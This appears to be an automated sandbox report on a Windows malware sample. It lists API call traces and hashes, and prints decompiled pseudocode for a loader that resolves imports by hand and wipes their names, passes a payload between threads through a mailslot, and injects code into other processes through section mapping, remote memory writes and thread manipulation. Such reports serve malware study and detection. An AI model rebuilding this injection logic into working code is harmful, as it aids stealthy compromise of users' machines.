  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
